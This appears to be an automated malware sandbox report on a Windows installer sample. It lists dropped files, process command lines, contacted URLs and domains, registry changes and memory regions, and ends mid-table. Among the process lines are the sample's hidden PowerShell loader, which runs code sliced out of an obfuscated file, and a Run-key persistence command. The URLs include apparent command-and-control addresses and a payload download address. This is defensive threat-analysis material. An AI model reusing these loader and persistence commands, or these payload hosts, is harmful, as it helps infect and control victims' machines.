Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
2024_04_005.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\Foremasthand.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nspE03E.tmp\System.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\vinduers\languages\Dentinen\Uengageredes.Raa169
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Windows\Templates\scramasaxe.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun
Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
|
dropped
|
||
|
C:\ProgramData\Skattetryk.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\545Ni1I
|
SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie
0x52, schema 4, UTF-8, version-valid-for 7
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Foremasthand.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2as3ofi5.au3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcctn0um.3y2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\vinduers\languages\Odometer\Zodiacs\himlene.pin
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\vinduers\languages\Udryddet.Hel
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\scramasaxe.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun
Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Skattetryk.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\Music\papirvgts.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun
Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
|
dropped
|
||
|
C:\Users\user\peniblere.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\Public\Music\papirvgts.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun
Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
|
dropped
|
There are 8 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\2024_04_005.exe
|
"C:\Users\user\Desktop\2024_04_005.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Gummigeds=Get-Content 'C:\Users\user\AppData\Local\vinduers\languages\Dentinen\Uengageredes.Raa169';$Ensrettendes=$Gummigeds.SubString(26864,3);.$Ensrettendes($Gummigeds)"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Foremasthand.exe
|
"C:\Users\user\AppData\Local\Temp\Foremasthand.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Mesenterical" /t REG_EXPAND_SZ
/d "%Minimisers% -windowstyle minimized $Emissionsspektrernes=(Get-ItemProperty -Path 'HKCU:\Sportily\').Vibse33;%Minimisers%
($Emissionsspektrernes)"
|
|
|
|
C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe
|
"C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\SysWOW64\cmd.exe"
|
|
|
|
C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe
|
"C:\Program Files (x86)\MthvkClINKDUcOgFiLOhtZcSTIXhiWiJAevGLytry\EsRWTuoxmxUO.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Mesenterical" /t REG_EXPAND_SZ /d "%Minimisers% -windowstyle
minimized $Emissionsspektrernes=(Get-ItemProperty -Path 'HKCU:\Sportily\').Vibse33;%Minimisers% ($Emissionsspektrernes)"
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.avolci.com/9pdo/?dzzh=OxSxCH&QtQ=z4EbQ/0+Z2zPU4/RVXslSAEzGqGuOzSPEXVlRRq2m+qj0dJnOgaQ/GbsoFonwncJq2LQE08kULao6+1QBSZUGJAxywljr6IstyX2fx3+/D27y0FPpkXVVLM=
|
91.195.240.19
|
||
|
http://localhost/wsman:Microsoft.PowerShell.Workflow
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png4
|
unknown
|
||
|
http://www.electra-airways.info/9pdo/?dzzh=OxSxCH&QtQ=3VEjKqPjJRFd1LEr7ftl6AeEjohVN1gCDcT03q/HcmbmUvzHTf5Gj5hvcK/QqTejry7alcBNCY2t4H+vJZJIHp8tocbCa9LgYeFrT1dxHygs+eIMLFxUj+8=
|
91.195.240.19
|
||
|
http://www.eternalsunrise.xyz/9pdo/?dzzh=OxSxCH&QtQ=/vSyP1yVbm8RGq0e2H3CzkNsaOHJl/3MYALL4DCZeeN+d5B22Kt3zVmvOtiuNe7fMoA4lcLFRPd10Vr4k50RXoBd/BdrO+PNRq+sm2OxhUPGBDukAmwFGJM=
|
66.29.135.159
|
||
|
http://www.avolci.com/9pdo/
|
91.195.240.19
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.klingerlumberltd.com/9pdo/
|
109.70.148.57
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://www.huatihui2.com/9pdo/
|
160.124.21.234
|
||
|
http://www.aneiina.top/9pdo/
|
172.67.206.253
|
||
|
http://www.huatihui2.com/9pdo/?QtQ=yWfXl3cQ7AE/v0p5ToAuwZLyk9Lhh0mNZnY0Fx87Qovx7+j0M2U0eDvKbOG4Eg1byXAdYPqGQWGzsH9rY6evN1VfPnxdp8WTE2/W4NT8KnWPJn/Hhe+jCJU=&dzzh=OxSxCH
|
160.124.21.234
|
||
|
http://www.jt-berger.store/9pdo/
|
217.160.0.183
|
||
|
http://www.scwspark.com/9pdo/?QtQ=exLCvVI2E5RJM8xtzs0Xap+s8OiVQ9Xf+6d2cWgRCMmdoFVcUWazUq00e3zK6s54E+NAVH76kqhd1uh4f2sE6XSWR+uNBmxDzZmQYEOmQjbtsHV8VYB5rTQ=&dzzh=OxSxCH
|
81.88.63.46
|
||
|
http://www.roundhaygardenscene.com/9pdo/
|
91.195.240.19
|
||
|
http://www.klingerlumberltd.com/9pdo/?dzzh=OxSxCH&QtQ=75RROWlFumYQQsRs+uDtc9uO+AXAqD8lv3fdL7/s35lj/OH9yxtYyj6nA6/7e2iXtS5R0Es4/LmqSDkvv7i6GZpCVVRFzb5vAOsXkTj5IR3tGpdpZrpWv9I=
|
109.70.148.57
|
||
|
http://www.n-benriya002.com/9pdo/
|
219.94.128.41
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
http://www.roundhaygardenscene.com/9pdo/?QtQ=J74hxHnGBH885BsW/8LXuNayyRNuPuSw4YspDnAEOKjh6WzTsbZVB7IKidTzlzfz/fWZ1zjvjb/XglRuOdKt4pl2brCljwyM4WC3fqBpCAw3lcb8459c8o0=&dzzh=OxSxCH
|
91.195.240.19
|
||
|
http://nsis.sf.net/NSIS_Error...
|
unknown
|
||
|
http://www.ejbodyart.com/9pdo/?dzzh=OxSxCH&QtQ=DnYaRovP48GzkkJrYMb+2fT4Pkhg/GvwuVP/6iFiedv+ORSC+0oTk/Gl1D7Kx2hOtjeczUyzMCTs4BuiBiMVlNIM74EOcC0w4I/7Krg2VTUnK1jygYdG7TE=
|
112.175.50.218
|
||
|
https://aka.ms/pscore6lBqq
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html4
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.n-benriya002.com/9pdo/?dzzh=OxSxCH&QtQ=REEnkW6M+TEq7R0RTFMUOKmG2dqiBXhD8cCdAclTZkEAO29Celit1EFdRt8L6G9Xd5xqtutsMklg2OrtOvYk99njtWVeRq/fD9R4HBgWh9ZRW3T/b1Zn0KY=
|
219.94.128.41
|
||
|
https://github.com/Pester/Pester4
|
unknown
|
||
|
http://www.fraternize.org/9pdo/?QtQ=VHiI6b/PPIA+OuARKaswq4b959D7SkxlZx7zpnglo7qdO2KXbQcQ9KuRFrEQ+F9C9sgTMWbLOSxIFzstzFciu1MPjvyftGkFxn6hWuyxlTlwRkGEMIrwXeI=&dzzh=OxSxCH
|
217.70.184.50
|
||
|
https://nobel.rs/FaZfCetBYix205.bin
|
37.48.104.133
|
||
|
http://www.huatihui2.com/9pdo/?QtQ=yWfXl3cQ7AE/v0p5ToAuwZLyk9Lhh0mNZnY0Fx87Qovx7+j0M2U0eDvKbOG4Eg1byXAdYPqGQWGzsH9rY6evN1VfPnxdp8WTE2/W4NT8KnWPJn/Hhe+jCJU=&FJ0pD=Txf0EHJ0JZ
|
160.124.21.234
|
||
|
http://www.fraternize.org/9pdo/
|
217.70.184.50
|
||
|
http://www.stevethatcher.com/9pdo/
|
91.195.240.19
|
||
|
http://www.jt-berger.store/9pdo/?QtQ=9/X38tn9qLO2xSF02XBR/rEx8jnqUAkCRmtcXfkuabXCkgKRDBhcw5/s5NSemU/1fww/nV1egvBpaCqwFnie4syGBvlnyI6Zu2K3XALMlG8T/sDwKknxjFA=&dzzh=OxSxCH
|
217.160.0.183
|
||
|
http://www.scwspark.com/9pdo/
|
81.88.63.46
|
||
|
http://www.xmlspy.com)
|
unknown
|
||
|
http://www.electra-airways.info/9pdo/
|
91.195.240.19
|
||
|
http://www.microsoft.c
|
unknown
|
||
|
http://www.aneiina.top/9pdo/?QtQ=0DGTuA6y7M/wLSr0kneg8YEAwW66+S1tR7phNjB1U9UE4xiz+PGigUaE1dFUhjL1hYKynwQR5zkXwRTBrBJI0vMFkq8Tbe7pIeNuz9jCCKB2fjNWkoH785s=&dzzh=OxSxCH
|
172.67.206.253
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.eternalsunrise.xyz/9pdo/
|
66.29.135.159
|
||
|
http://n-benriya002.com/9pdo/?dzzh=OxSxCH&QtQ=REEnkW6M
|
unknown
|
There are 30 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.eternalsunrise.xyz
|
66.29.135.159
|
|
|
|
www.n-benriya002.com
|
unknown
|
|
|
|
www.maaltijdkado.com
|
unknown
|
|
|
|
www.roundhaygardenscene.com
|
unknown
|
|
|
|
www.mirkogrigolettoshop.com
|
unknown
|
|
|
|
www.ejbodyart.com
|
unknown
|
|
|
|
www.electra-airways.info
|
unknown
|
|
|
|
www.sallielareine.com
|
unknown
|
|
|
|
www.jroblox.com
|
unknown
|
|
|
|
www.stevethatcher.com
|
unknown
|
|
|
|
www.klingerlumberltd.com
|
unknown
|
|
|
|
www.fraternize.org
|
unknown
|
|
|
|
www.avolci.com
|
unknown
|
|
|
|
webredir.vip.gandi.net
|
217.70.184.50
|
||
|
ejbodyart.com
|
112.175.50.218
|
||
|
n-benriya002.com
|
219.94.128.41
|
||
|
www.huatihui2.com
|
160.124.21.234
|
||
|
www.thegochettway.com
|
104.21.36.104
|
||
|
parkingpage.namecheap.com
|
91.195.240.19
|
||
|
www.scwspark.com
|
81.88.63.46
|
||
|
www.jt-berger.store
|
217.160.0.183
|
||
|
klingerlumberltd.com
|
109.70.148.57
|
||
|
www.aneiina.top
|
172.67.206.253
|
||
|
nobel.rs
|
37.48.104.133
|
||
|
parking-exp.regery.net
|
138.201.79.103
|
||
|
www.huahuas.pics
|
20.150.194.188
|
||
|
www.raymondj.online
|
66.96.162.148
|
||
|
www.gattosat.icu
|
109.123.121.243
|
There are 18 hidden domains, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
66.29.135.159
|
www.eternalsunrise.xyz
|
United States
|
|
|
|
160.124.21.234
|
www.huatihui2.com
|
South Africa
|
||
|
219.94.128.41
|
n-benriya002.com
|
Japan
|
||
|
172.67.206.253
|
www.aneiina.top
|
United States
|
||
|
217.70.184.50
|
webredir.vip.gandi.net
|
France
|
||
|
37.48.104.133
|
nobel.rs
|
Netherlands
|
||
|
81.88.63.46
|
www.scwspark.com
|
Italy
|
||
|
217.160.0.183
|
www.jt-berger.store
|
Germany
|
||
|
91.195.240.19
|
parkingpage.namecheap.com
|
Germany
|
||
|
109.70.148.57
|
klingerlumberltd.com
|
United Kingdom
|
||
|
112.175.50.218
|
ejbodyart.com
|
Korea Republic of
|
There are 1 hidden IPs, click here to show them.
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\falcade\encashing
|
desulphurising
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Forvirringernes\Uninstall\tick\detouring
|
asclepiadaceae
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\Tolypeutes\Uninstall\succumbed\brevformatets
|
compromised
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Poorly
|
feoffing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\genvejstekst
|
interminister
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\horeungers\Uninstall\pregustic\Derning
|
ase
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\safari
|
Restocks
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Spejlgspandens\antaphroditic
|
dyrlgers
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Drip
|
helminthic
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Bulmerne
|
indvendige
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\enspndernaturer\mothproofed
|
tergiversated
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Befogged39\klirrendes
|
whilly
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Skibindingen\Uninstall\vrangens\kontokorterne
|
emigrator
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\lsbarhedens\Uninstall\sugningers\Strigillose
|
Persistently36
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Billedfilformaternes\articulators
|
straale
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\godtens\rederne
|
Bygningskonduktrs
|
||
|
HKEY_CURRENT_USER\SOFTWARE\food
|
lytterne
|
||
|
HKEY_CURRENT_USER\SOFTWARE\bescreened
|
nitrogelatine
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\anthrasilicosis
|
nedgaaende
|
||
|
HKEY_CURRENT_USER\Sportily
|
Vibse33
|
||
|
HKEY_CURRENT_USER\Environment
|
Minimisers
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Mesenterical
|
There are 12 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
21170000
|
unclassified section
|
page execute and read and write
|
|
|
|
38B0000
|
trusted library allocation
|
page read and write
|
|
|
|
6160000
|
unkown
|
page execute and read and write
|
|
|
|
1370000
|
system
|
page execute and read and write
|
|
|
|
3A90000
|
trusted library allocation
|
page read and write
|
|
|
|
2F50000
|
system
|
page execute and read and write
|
|
|
|
91DC000
|
direct allocation
|
page execute and read and write
|
|
|
|
6A8CC000
|
unkown
|
page read and write
|
||
|
6BFD2000
|
unkown
|
page execute read
|
||
|
3921000
|
heap
|
page read and write
|
||
|
5499000
|
heap
|
page read and write
|
||
|
BE1000
|
unkown
|
page readonly
|
||
|
54DC000
|
heap
|
page read and write
|
||
|
39C8000
|
unkown
|
page read and write
|
||
|
6A0B7000
|
unkown
|
page execute read
|
||
|
6F64000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
4FD3000
|
trusted library allocation
|
page read and write
|
||
|
70000
|
heap
|
page read and write
|
||
|
4658000
|
unkown
|
page read and write
|
||
|
890000
|
heap
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
6BE000
|
stack
|
page read and write
|
||
|
AE0000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3920000
|
heap
|
page read and write
|
||
|
6A5F0000
|
unkown
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2B6C000
|
remote allocation
|
page execute and read and write
|
||
|
68675000
|
unkown
|
page write copy
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A89B000
|
unkown
|
page write copy
|
||
|
6BC2E000
|
unkown
|
page execute read
|
||
|
3B5A000
|
unkown
|
page read and write
|
||
|
10D8000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
8DC000
|
heap
|
page read and write
|
||
|
8E5000
|
heap
|
page read and write
|
||
|
6A732000
|
unkown
|
page write copy
|
||
|
54AB000
|
heap
|
page read and write
|
||
|
8E2000
|
heap
|
page read and write
|
||
|
3300000
|
heap
|
page read and write
|
||
|
3460000
|
heap
|
page read and write
|
||
|
8D2000
|
heap
|
page read and write
|
||
|
54AA000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
69A0000
|
direct allocation
|
page read and write
|
||
|
90C000
|
heap
|
page read and write
|
||
|
718000
|
heap
|
page read and write
|
||
|
2D54000
|
heap
|
page read and write
|
||
|
6F0A000
|
heap
|
page read and write
|
||
|
6A9FF000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
1260000
|
unkown
|
page read and write
|
||
|
547B000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6AA7F000
|
unkown
|
page read and write
|
||
|
545F000
|
heap
|
page read and write
|
||
|
541B000
|
heap
|
page read and write
|
||
|
875000
|
unkown
|
page read and write
|
||
|
204D0000
|
direct allocation
|
page read and write
|
||
|
55A0000
|
direct allocation
|
page read and write
|
||
|
6A914000
|
unkown
|
page write copy
|
||
|
5489000
|
heap
|
page read and write
|
||
|
825D000
|
stack
|
page read and write
|
||
|
89D000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
8140000
|
trusted library allocation
|
page execute and read and write
|
||
|
698AB000
|
unkown
|
page read and write
|
||
|
694D9000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
68693000
|
unkown
|
page read and write
|
||
|
DFC000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
8871000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A8FA000
|
unkown
|
page read and write
|
||
|
6936F000
|
unkown
|
page execute read
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6AA1B000
|
unkown
|
page read and write
|
||
|
80C000
|
heap
|
page read and write
|
||
|
6AA19000
|
unkown
|
page read and write
|
||
|
6A9F8000
|
unkown
|
page read and write
|
||
|
342E000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
686B3000
|
unkown
|
page read and write
|
||
|
4B4A000
|
unclassified section
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
957000
|
heap
|
page read and write
|
||
|
867C000
|
stack
|
page read and write
|
||
|
691EF000
|
unkown
|
page read and write
|
||
|
6A668000
|
unkown
|
page write copy
|
||
|
5492000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
8B2000
|
heap
|
page read and write
|
||
|
C80000
|
unkown
|
page readonly
|
||
|
2175C000
|
direct allocation
|
page execute and read and write
|
||
|
6951E000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
92FF000
|
stack
|
page read and write
|
||
|
5F0000
|
unkown
|
page execute read
|
||
|
6AA89000
|
unkown
|
page write copy
|
||
|
88A000
|
heap
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
972000
|
trusted library allocation
|
page read and write
|
||
|
A6E000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
81F0000
|
heap
|
page read and write
|
||
|
877000
|
unkown
|
page readonly
|
||
|
6AA1C000
|
unkown
|
page write copy
|
||
|
215B9000
|
direct allocation
|
page execute and read and write
|
||
|
3CEC000
|
unkown
|
page read and write
|
||
|
6DEE000
|
stack
|
page read and write
|
||
|
AA0000
|
heap
|
page read and write
|
||
|
67FF000
|
stack
|
page read and write
|
||
|
2E20000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A181000
|
unkown
|
page read and write
|
||
|
3DAD000
|
direct allocation
|
page execute and read and write
|
||
|
2B1D000
|
stack
|
page read and write
|
||
|
5AB000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6A29D000
|
unkown
|
page readonly
|
||
|
698CF000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3C10000
|
trusted library allocation
|
page read and write
|
||
|
20EF1000
|
heap
|
page read and write
|
||
|
15DE000
|
stack
|
page read and write
|
||
|
33C4000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
68775000
|
unkown
|
page read and write
|
||
|
691B1000
|
unkown
|
page read and write
|
||
|
860000
|
unkown
|
page readonly
|
||
|
71D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5781000
|
trusted library allocation
|
page read and write
|
||
|
77AB000
|
stack
|
page read and write
|
||
|
B9DC000
|
direct allocation
|
page execute and read and write
|
||
|
6A059000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
10E0000
|
unkown
|
page readonly
|
||
|
5570000
|
direct allocation
|
page read and write
|
||
|
6A87B000
|
unkown
|
page write copy
|
||
|
8D2000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
33B8000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
471E000
|
stack
|
page read and write
|
||
|
877000
|
unkown
|
page readonly
|
||
|
5260000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6E8B000
|
heap
|
page read and write
|
||
|
13DA000
|
system
|
page execute and read and write
|
||
|
3B70000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D60000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6920000
|
direct allocation
|
page read and write
|
||
|
4334000
|
unkown
|
page read and write
|
||
|
6867A000
|
unkown
|
page read and write
|
||
|
6AA83000
|
unkown
|
page write copy
|
||
|
920000
|
trusted library allocation
|
page read and write
|
||
|
432000
|
unkown
|
page read and write
|
||
|
904000
|
heap
|
page read and write
|
||
|
215BD000
|
direct allocation
|
page execute and read and write
|
||
|
1260000
|
unkown
|
page read and write
|
||
|
6971000
|
unkown
|
page execute and read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
5192000
|
unclassified section
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
2D4D000
|
heap
|
page read and write
|
||
|
6A2CA000
|
unkown
|
page write copy
|
||
|
6A928000
|
unkown
|
page read and write
|
||
|
11D0000
|
unkown
|
page read and write
|
||
|
A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
691E9000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6AA5B000
|
unkown
|
page write copy
|
||
|
3921000
|
heap
|
page read and write
|
||
|
5AB000
|
unkown
|
page readonly
|
||
|
371F000
|
unkown
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
27F76E03000
|
system
|
page execute and read and write
|
||
|
6B80000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
8D2000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
76F0000
|
trusted library allocation
|
page read and write
|
||
|
5956000
|
trusted library allocation
|
page read and write
|
||
|
27F78B00000
|
trusted library allocation
|
page read and write
|
||
|
88BD000
|
heap
|
page read and write
|
||
|
6E10000
|
heap
|
page read and write
|
||
|
10A0000
|
unkown
|
page readonly
|
||
|
348B000
|
heap
|
page read and write
|
||
|
8FE000
|
heap
|
page read and write
|
||
|
20C4D000
|
stack
|
page read and write
|
||
|
86E000
|
unkown
|
page readonly
|
||
|
69415000
|
unkown
|
page read and write
|
||
|
54DC000
|
heap
|
page read and write
|
||
|
33B9000
|
heap
|
page read and write
|
||
|
6EFD000
|
heap
|
page read and write
|
||
|
2A3F000
|
stack
|
page read and write
|
||
|
6A903000
|
unkown
|
page read and write
|
||
|
6A2B1000
|
unkown
|
page read and write
|
||
|
209AD000
|
stack
|
page read and write
|
||
|
2C80000
|
unkown
|
page readonly
|
||
|
3921000
|
heap
|
page read and write
|
||
|
6930000
|
direct allocation
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
27F76F20000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
124C000
|
unkown
|
page read and write
|
||
|
6865A000
|
unkown
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
686AF000
|
unkown
|
page read and write
|
||
|
27F78A00000
|
trusted library allocation
|
page read and write
|
||
|
36D12000
|
system
|
page read and write
|
||
|
88E8000
|
heap
|
page read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
54DC000
|
heap
|
page read and write
|
||
|
20D3F000
|
stack
|
page read and write
|
||
|
6B4B7000
|
unkown
|
page execute read
|
||
|
10A0000
|
unkown
|
page readonly
|
||
|
6950000
|
heap
|
page execute and read and write
|
||
|
8F7000
|
heap
|
page read and write
|
||
|
4694000
|
unclassified section
|
page read and write
|
||
|
11D0000
|
unkown
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
21130000
|
direct allocation
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
71CD000
|
stack
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
3921000
|
heap
|
page read and write
|
||
|
8B1000
|
heap
|
page read and write
|
||
|
20E20000
|
remote allocation
|
page read and write
|
||
|
27F77030000
|
heap
|
page read and write
|
||
|
6AA0C000
|
unkown
|
page write copy
|
||
|
5492000
|
heap
|
page read and write
|
||
|
129E000
|
heap
|
page read and write
|
||
|
33A0000
|
heap
|
page read and write
|
||
|
204C0000
|
direct allocation
|
page read and write
|
||
|
860000
|
unkown
|
page readonly
|
||
|
344E000
|
stack
|
page read and write
|
||
|
216C000
|
remote allocation
|
page execute and read and write
|
||
|
8FA000
|
heap
|
page read and write
|
||
|
352C000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
8397000
|
heap
|
page read and write
|
||
|
2D54000
|
heap
|
page read and write
|
||
|
342A000
|
heap
|
page read and write
|
||
|
40B000
|
unkown
|
page read and write
|
||
|
6E84000
|
heap
|
page read and write
|
||
|
6A877000
|
unkown
|
page write copy
|
||
|
8F7000
|
heap
|
page read and write
|
||
|
5929000
|
trusted library allocation
|
page read and write
|
||
|
2BF6000
|
heap
|
page read and write
|
||
|
69225000
|
unkown
|
page execute read
|
||
|
860000
|
unkown
|
page readonly
|
||
|
1A01000
|
unkown
|
page readonly
|
||
|
10D8000
|
heap
|
page read and write
|
||
|
6866C000
|
unkown
|
page write copy
|
||
|
88B8000
|
heap
|
page read and write
|
||
|
221E0000
|
